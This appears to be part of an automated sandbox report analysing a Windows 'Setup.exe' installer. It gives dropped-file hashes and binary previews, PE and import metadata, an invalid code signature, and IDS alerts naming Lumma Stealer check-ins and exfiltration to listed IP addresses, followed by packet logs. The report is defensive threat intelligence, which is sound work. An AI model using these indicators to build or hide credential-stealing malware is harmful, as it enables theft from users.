                                                                                                                                                                      SSDEEP:1536:Dn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5G:D+AqVnBypIbv18mLthfhnueoMmOqDoiu
                                                                                                                                                                      MD5:CCDB4B10228BD73A42BD9BDCACD6C3FA
                                                                                                                                                                      SHA1:F3A53ECDAAB5FC3A748030C6F3228522B425F8C7
                                                                                                                                                                      SHA-256:AC2797C2FE10F695311429692DC965D78E2DD1832871705B30F113F52ED717C0
                                                                                                                                                                      SHA-512:CD90A39214166E12B6D7C3616353BB3D796DD15F612E986BF9DBD5B635B4F6D62957F11119FD1945E0A4C73E07C0045D64371BBD8C3949D6659C135E34A8E2ED
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.]...U.....e..SV.u.W.........j...j.S.D....E.....x..v..@....9m.....E.P.E.P.E.P.......tN.E.3..e..Fj..E.E.VPS.u..........M...+...E..e..V.E.E.VPS.u..........M...*...8...H..|9...D9.t..@83.C.X..|9...D9.t..@8...@....*...&..^._^3.[....U..E...8.@.SVW.p.....~..u..E.P..^.....E.....3.]....0.....N..E......A....E.A..E..A..M.U.E...3.]..A..q..E..A..U.u.E....}..t..M..$....}..t..M........tM.E..P.......u>.u.....*..3..B.V....H..|9...D9.t..@8.P..|9...D9.t..@8.X.....+.E..M.Q.@.......P.....u......)..3.>B.V..M....._^..[....U......,SV.u.3.W..\$..~..v..F..H..Dk...D$..N..1.~..t.PSS..........6.t$............]...j....B7.......K...j....07..3..j.Z..|$........Q..C....3..D$.Y..........j.Pj.j.V..^...............N..t$.j..t$....D$0.A..D$4.A..D$8.A.j.j.V...D$H.^............D$$.D$.P.D$.P.D$.P.D$.P.D$0P.D$<P......tm.|$......t......|$..t......|$..t.....f.D$ .L$(f.G..D$$f.G..'....D$....@.D$.;D$...)....|$..t$.WS....S..B..Y.9S..B...u.Y....'...&..L$(.F.............u.....'...F......._^3.[..]...U..SV.u
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):81920
                                                                                                                                                                      Entropy (8bit):7.998049076509527
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:yBfTExvxpZXh9ubx46Aluo2N2J8hcTqQieQoVSPUFowd9XPy0QZuX/OBpNL:yBfgBxJ9M1AAo2Nk+KieVFLcZ6mjNL
                                                                                                                                                                      MD5:281F4DB819997789982068F550A35072
                                                                                                                                                                      SHA1:FAF56A4CB2B14ADBA50CEFB49927B4E73F1FF5C2
                                                                                                                                                                      SHA-256:5B195BE894B7155D3147588D728098068D36CDBB9DF72FABD577057E699E2025
                                                                                                                                                                      SHA-512:8A5956B6E2DA603A5A0E1CFDBBDCC6D4094C92DAF0E0465162B3630DA642F22A90B0972B6B6C83A969BE66A6FA0B0201F40AA24777F1C4A6B5DD2895D91109F0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:nj.*~m^$..~hF.8v..S.._..(%....=....I......vS.x.G .........Xd....l...e.NJ4.81...{u.9.5..k......:.E2.bY.Y.&.yQB.E..|.[s>...(.e.`...q{I...3.J..R?.... ..0....0........'....t.(..7o...ye<At....-.<...n.......d..1FU.c...L..af..G..../.{."...H/:....h..'.|.#B....v....z......T.....o....E)...#Y`s..y..].].*..._.....e....ab0.+..;`c5).......rS...7U9.O.......l....O..UW.].)Rk ..2....Q..QD.3A.zx.I..y.....%......aM..M.cd.6$R.6......c..t2..(MDLT-i........nR.w...cI..c....'...=.o........".O.......C.h"..E.x.`...s4C.5)..s..M......%=iW...^.f.F..X>f.Z.U.8.yk.(bt.NW.....&...g..3..&>.LgL...M.Y5a....O.4.;.....+...I;6d..E.4.<....T...V.....r...9..&..................j..3tU..A..5.......l........i-M..:..W.u.MF.Kd.1a..../Z{+.....&.\.nj.{..6y..<.2....s/Y.Y.#.;...W...Ty.D%s:..x.>....u........G.x.^....1.H......Y..R..!}l..?c=J0,pD0.....=,..e+50.......G.....X..N.G!i.......526.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.
                                                                                                                                                                      Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                      File Type:OpenPGP Public Key
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):12492
                                                                                                                                                                      Entropy (8bit):7.984190657327211
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:c1Lx+zglTnjPebzZfwXumF9g76gzy2X44vYvu2:ExNebNfwek9g7dzO
                                                                                                                                                                      MD5:14ABCC1FCB7EB77CB471AAA77133F0E8
                                                                                                                                                                      SHA1:457C0EDD3339EEE816C6917B33C2B1F6B962BD21
                                                                                                                                                                      SHA-256:CBB561B7501EDC6B3DBB134C951459887D7F1D02AE151FD2EEED6EF1DD0A26EA
                                                                                                                                                                      SHA-512:71FB1BA3C8B5844A7FD98720E18803F0D416877FAFA2E5AE21012890E2322C588C2EF1B7535C89CA6C065B3D41DCA2215CC22D7D4E0EB1F215E0A10EBCEDF6D7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......t...b..A.......@.a.<.wH<...Y9.<%.K...<.....h..e.]...`...u.."<,h..y7......P.yK..o....36#%..%gc*k.?.Q....Q.^.....p....iF....Gf.f0..?1.r\0?U..)~.(b.s....Z..K.4U...i.-.......FG.b.....CF.d.+...p..V.......c..'^$.,.......c...0...R.t.W_..../...z.&ng....8.". ....!. .*H.0.....K.....tTl.!._....u%...g.....O.M2....yX........yk....m...~m...W.U.. .......aX.6@...<.....J.&.b..e....c..P...|. -.#LN...3...)dR5......../r...?.O.C;F....R.#~.......h.M.2............Jv! .....f.P..Q..{Q.....)h.P.S....K.A.S...{.._.C...$.:._.m.4...=.}Vn..:.c*I.....ud|22.r.8...}......s.f..vx...,...{M.N.mJUj.g.SH.......K--........tX.;....{......./.c..s?.$.6+..b."..K..T+...n..,.8:`....,.....".96..0..p<Z5....D.Vd..*.x$....s..T..Ro...q.W.+..Di....&.^.5...f...X..x..d.....h.Y.M..L6$..p.gk..i.......~=.:.../L..]`.P_..K.@+q.u..B.".9A...#.g9..O2..0.(y+..D&`+L.]....!.......0Ab...T3..B&E..}..qE....~..SQ...F;H.._c..-.H......$i.....)..6......O.="....c...U.X..<.7G..%..]d....U..@...;..b...d
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):130048
                                                                                                                                                                      Entropy (8bit):6.681687090731543
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:FU4CE0Imbi80PtCZEMnVIPPBxT/sZydTmRV:FhClbfSCOMVIPPL/sZx
                                                                                                                                                                      MD5:9A4BA095FCF59853D46AACC0ED9ACEDC
                                                                                                                                                                      SHA1:2F8F477F9998C719AC860B8DF65CF64F2E1AF684
                                                                                                                                                                      SHA-256:3ACADE67A3C43300472BADD003325ACD4D4CA5A32857312BBBFD21E5A16AED9A
                                                                                                                                                                      SHA-512:475E483ED5E0720D30C68A2BD268299A0346ED0E660252C97982C6AB605B7C81BE83000EF9947F5F8ADBE92B0BE660013BA7FCEE5E843565BA82277706D7DC1E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:f...................%....=....uef..L$.f..T$......f.n.f.T..=J.f.s.4f...f...f...f.v.f...%....=....t#f..L$.f....%.......t...0>J....(>J..f..L$.f....%................f..L$.f....%..................X..........]...f..T$.f.~.f.s. f.~.....................f....>J.f...P>J...Y..........f..d$.f..T$.f.~....u f.s. f.~.....?...........u....f....=J.f.W.f.T.f.v.f...%....=....uUf....f..d$.%......................t.f....%....=.?..r....f....%....=.?..s...... >J....X..........Yf.~.f.s. f.~..........f....=J.........t0f.~.....%....=....w.r....w....f..D$..D$..........f..D$..T$......T$.....T$......$.9...D$.......~(=......<...V.................W..?...&=..........V................W.......X.......X..=J.......f.Y...\..=J.f.Y...\.........f.(.@.J.f.(5.=J.f.Y.f.X.f.p....Y...X...X.f..%.>J.f.n................ ..f.W...?..f......YT$...Y.f.s.-f.p.Df.(=.=J...X.f.Y...X.f...f.Y...Y.f.Y.f.X.f.Y...Y.f.p....Y.f.p....Y...Y.f.n.f.s.-f.n.f.v.f.....X...X.f.T...X.f.W.f.v.f.....\.......X.f.T.f...._..\...X...X.
Process:C:\Windows\SysWOW64\extrac32.exe
File Type:data
Category:dropped
Size (bytes):84992
Entropy (8bit):6.0785099969245255
Encrypted:false
SSDEEP:1536:wLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8and:wLezW9FfTut/Dde6u640ewy4Za9coRCf
MD5:682B26D2846887714186B4B1D1CDC9E5
SHA1:83852C4B46E5227BF3E504332FCD2DA383522E28
SHA-256:59C4F79996F0F5D26FE7738394AB12FFEBA82518A05904AF12044F09DC6AF077
SHA-512:893C430C1C63D5A153832DB6098460F058236FFE33143F7F3BE15D1B8424138402D177A16494353E677ED051DF1FBF7ADF980FE080589E24876CCA73C4A25CE2
Malicious:false
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):4.648387822130976
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Setup.exe
File size:73'409'696 bytes
MD5:588eeb3d8f305fc008f034e10e0015c0
SHA1:7a77ed807fbea72e7c94295343cf795e864adfae
SHA256:d46db03077a8a6773fd70b126d8f3d61e8370ed0c1dfb26df73499cb3b65355f
SHA512:695c39c2431ccb608cab670b50b74ede41284f0d1bb22330f1cd7ac72812e72be314a4ad1e75589391f813a3f5d40db4d49d3495f143c8f3ef4615f73412e760
SSDEEP:24576:VEqVaQlXM7Iqu1NA+quN4PtP644/97g/z6VvwyKcqxj8FbgtRWY/gEyhJlgi:Taec0qmiPJ644/97I6VvGj8Fbg63rhB
TLSH:E6F79B2E226CF7F91BBD846673933821E736AA802B10A34FF836D44D1CF68B75159B15
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
Icon Hash:ccb2b1717133b2cc
Entrypoint:0x4038af
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:be41bf7b8cc010b614bd36bbca606973
Signature Valid:false
Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
• 24/06/2022 09:22:08 14/04/2025 16:06:58
Subject Chain
• OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
Version:3
Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
Serial:115BBE9E1C286827AF66E7A01390C206
Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007FC86527C00Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007FC86527BCEDh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007FC86527BCDBh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007FC8652795DAh
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007FC86527B9B1h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FC865279663h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FC8652795DAh
add esi, 02h
cmp word ptr [esi], bx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xac40           0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x100000         0x59efa       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x45fffd0        0x24d0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x86000          0x994         .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x9000           0x2d0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x728c        0x7400    419d4e1be1ac35a5db9c47f553b27cea  False     0.6566540948275862  data       6.499708590628113   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x9000           0x2b6e        0x2c00    cca1ca3fbf99570f6de9b43ce767f368  False     0.3678977272727273  data       4.497932535153822   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xc000           0x72b9c       0x200     77f0839f8ebea31040e462523e1c770e  False     0.279296875         data       1.8049406284608531  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x7f000          0x81000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x100000         0x59efa       0x5a000   0ccbca815b7df0bc03a078ee84f909aa  False     0.9669406467013889  data       7.86959447360422    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x15a000         0xfd6         0x1000    b0d05814ea00da63327959615c44f046  False     0.568359375         data       5.309946074381747   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size     Type                                                                                   Language  Country        ZLIB Complexity
RT_ICON        0x1002c8  0x4ce42  PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced                            English   United States  0.9883726099077302
RT_ICON        0x14d10c  0x68d9   PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced                            English   United States  0.9950076375693901
RT_ICON        0x1539e8  0x209f   PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced                              English   United States  1.0013172075200574
RT_ICON        0x155a88  0x2668   Device independent bitmap graphic, 48 x 96 x 32, image size 9792                       English   United States  0.5272579332790887
RT_ICON        0x1580f0  0x1128   Device independent bitmap graphic, 32 x 64 x 32, image size 4352                       English   United States  0.6261384335154827
RT_ICON        0x159218  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1088                       English   United States  0.7978723404255319
RT_DIALOG      0x159680  0x100    data                                                                                   English   United States  0.5234375
RT_DIALOG      0x159780  0x11c    data                                                                                   English   United States  0.6056338028169014
RT_DIALOG      0x15989c  0x60     data                                                                                   English   United States  0.7291666666666666
RT_GROUP_ICON  0x1598fc  0x5a     data                                                                                   English   United States  0.7888888888888889
RT_VERSION     0x159958  0x2cc    data                                                                                   English   United States  0.4818435754189944
RT_MANIFEST    0x159c24  0x2d6    XML 1.0 document, ASCII text, with very long lines (726), with no line terminators     English   United States  0.5647382920110193
DLL: Imports
KERNEL32.dll: SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll: GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll: SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll: SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll: RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll: ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll: CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll: GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system  Country where language is spoken  Map
English                         United States
Timestamp                        SID      Signature                                                   Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-24T01:33:55.070414+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.4  49742        188.114.97.6    443        TCP
2024-12-24T01:33:56.093923+0100  2049836  ET MALWARE Lumma Stealer Related Activity                   1         192.168.2.4  49742        188.114.97.6    443        TCP
2024-12-24T01:33:56.093923+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                   1         192.168.2.4  49742        188.114.97.6    443        TCP
2024-12-24T01:33:57.315963+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.4  49743        188.114.97.6    443        TCP
2024-12-24T01:33:58.076932+0100  2049812  ET MALWARE Lumma Stealer Related Activity M2                1         192.168.2.4  49743        188.114.97.6    443        TCP
2024-12-24T01:33:58.076932+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                   1         192.168.2.4  49743        188.114.97.6    443        TCP
2024-12-24T01:33:59.453447+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.4  49744        188.114.97.6    443        TCP
2024-12-24T01:34:01.741478+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.4  49745        188.114.97.6    443        TCP
2024-12-24T01:34:04.082295+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.4  49746        188.114.97.6    443        TCP
2024-12-24T01:34:06.375667+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.4  49747        188.114.97.6    443        TCP
2024-12-24T01:34:08.690904+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.4  49748        188.114.97.6    443        TCP
2024-12-24T01:34:09.604944+0100  2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration       1         192.168.2.4  49748        188.114.97.6    443        TCP
2024-12-24T01:34:10.828901+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.4  49749        188.114.97.6    443        TCP
2024-12-24T01:34:11.616553+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                   1         192.168.2.4  49749        188.114.97.6    443        TCP
2024-12-24T01:34:13.058213+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.4  49750        172.67.169.205  443        TCP
2024-12-24T01:34:18.115128+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update   3         192.168.2.4  49751        104.21.84.113   443        TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                                                      Dec 24, 2024 01:33:56.101514101 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:56.101604939 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:56.102461100 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:56.102474928 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:57.315892935 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:57.315963030 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:57.317234993 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:57.317245960 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:57.317567110 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:57.318732023 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:57.318763971 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:57.318811893 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.076922894 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.076982021 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.077030897 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.077048063 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.077460051 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.077527046 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.077534914 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.078310966 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.078360081 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.078366041 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.085298061 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.085350990 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.085357904 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.093523026 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.093580008 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.093590021 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.106015921 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.106064081 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.106070995 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.106137037 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.106190920 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.106239080 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.106257915 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.106268883 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.106272936 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.238605976 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.238646984 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.238709927 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.239480019 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.239499092 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:59.453344107 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:59.453447104 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:59.454647064 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:59.454675913 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:59.455013037 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:59.456144094 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:59.456300020 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:59.456343889 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:59.456445932 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:59.456460953 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:00.437510967 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:00.437609911 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:00.437819004 CET49744443192.168.2.4188.114.97.6
